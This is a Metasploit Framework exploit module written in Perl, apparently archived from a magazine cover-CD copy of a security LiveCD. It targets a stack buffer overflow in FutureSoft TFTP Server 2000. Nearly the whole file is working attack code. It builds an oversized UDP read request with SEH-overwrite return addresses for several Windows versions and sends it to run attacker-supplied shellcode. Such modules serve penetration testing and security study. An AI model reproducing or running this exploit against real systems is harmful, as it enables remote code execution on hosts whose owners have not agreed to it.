home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / futuresoft_tftpd.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  121 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::futuresoft_tftpd;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'FutureSoft TFTP Server 2000 Buffer Overflow',
  21.     'Version'  => '$Revision: 1.4 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
  25.     'Priv'  => 0,
  26.  
  27.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  28.     'UserOpts'  =>
  29.       {
  30.         'RHOST' => [1, 'ADDR', 'The target address'],
  31.         'RPORT' => [1, 'PORT', 'The target port', 69],
  32.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  33.       },
  34.  
  35.     'Payload' =>
  36.       {
  37.         'Space'     => 350,
  38.         'BadChars'  => "\x00",
  39.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  40.         'Keys'      => ['+ws2ord'],
  41.       },
  42.  
  43.     'Description'  => Pex::Text::Freeform(qq{
  44.         This module exploits a stack overflow in the FutureSoft TFTP Server
  45.     2000 product. By sending an overly long transfer-mode string, we were able
  46.     to overwrite both the SEH and the saved EIP. A subsequent write-exception 
  47.     that will occur allows the transferring of execution to our shellcode 
  48.     via the overwritten SEH. This module has been tested against Windows
  49.     2000 Professional and for some reason does not seem to work against 
  50.     Windows 2000 Server (could not trigger the overflow at all).
  51. }),
  52.  
  53.     'Refs'  =>
  54.       [
  55.           ['OSVDB', '16954'],      
  56.         ['CVE', '2005-1812'],
  57.         ['BID', '13821'],
  58.         ['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],
  59.         ['MIL', '21'],
  60.       ],
  61.  
  62.     'Targets' =>
  63.       [
  64.         ['Windows 2000 Pro English ALL',   0x75022ac4], # ws2help.dll
  65.         ['Windows XP Pro SP0/SP1 English', 0x71aa32ad], # ws2help.dll
  66.         ['Windows NT SP5/SP6a English',    0x776a1799], # ws2help.dll
  67.         ['Windows 2003 Server English',    0x7ffc0638], # PEB return
  68.       ],
  69.     'Keys' => ['tftpd'],
  70.  
  71.     'DisclosureDate' => 'May 31 2005',
  72.   };
  73.  
  74. sub new {
  75.     my $class = shift;
  76.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  77.     return($self);
  78. }
  79.  
  80. sub Exploit
  81. {
  82.     my $self = shift;
  83.     my $target_host = $self->GetVar('RHOST');
  84.     my $target_port = $self->GetVar('RPORT');
  85.     my $target_idx  = $self->GetVar('TARGET');
  86.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  87.     my $target = $self->Targets->[$target_idx];
  88.  
  89.     if (! $self->InitNops(128)) {
  90.         $self->PrintLine("[*] Failed to initialize the nop module.");
  91.         return;
  92.     }
  93.  
  94.     my $splat = Pex::Text::AlphaNumText(142);
  95.  
  96.     my $sploit =
  97.       "\x00\x01". "metasploit.txt". "\x00". $splat.
  98.       "\xeb\x06". pack('V', $target->[1]).
  99.       $shellcode. "\x00";
  100.  
  101.     $self->PrintLine(sprintf("[*] Trying to exploit target %s w/ return 0x%.8x", $target->[0], $target->[1]));
  102.  
  103.     my $s = Msf::Socket::Udp->new
  104.       (
  105.         'PeerAddr'  => $target_host,
  106.         'PeerPort'  => $target_port,
  107.         'LocalPort' => $self->GetVar('CPORT'),
  108.         'SSL'       => $self->GetVar('SSL'),
  109.       );
  110.     if ($s->IsError) {
  111.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  112.         return;
  113.     }
  114.  
  115.     $s->Send($sploit);
  116.     $self->Handler($s);
  117.     $s->Close();
  118.     return;
  119. }
  120.  
  121.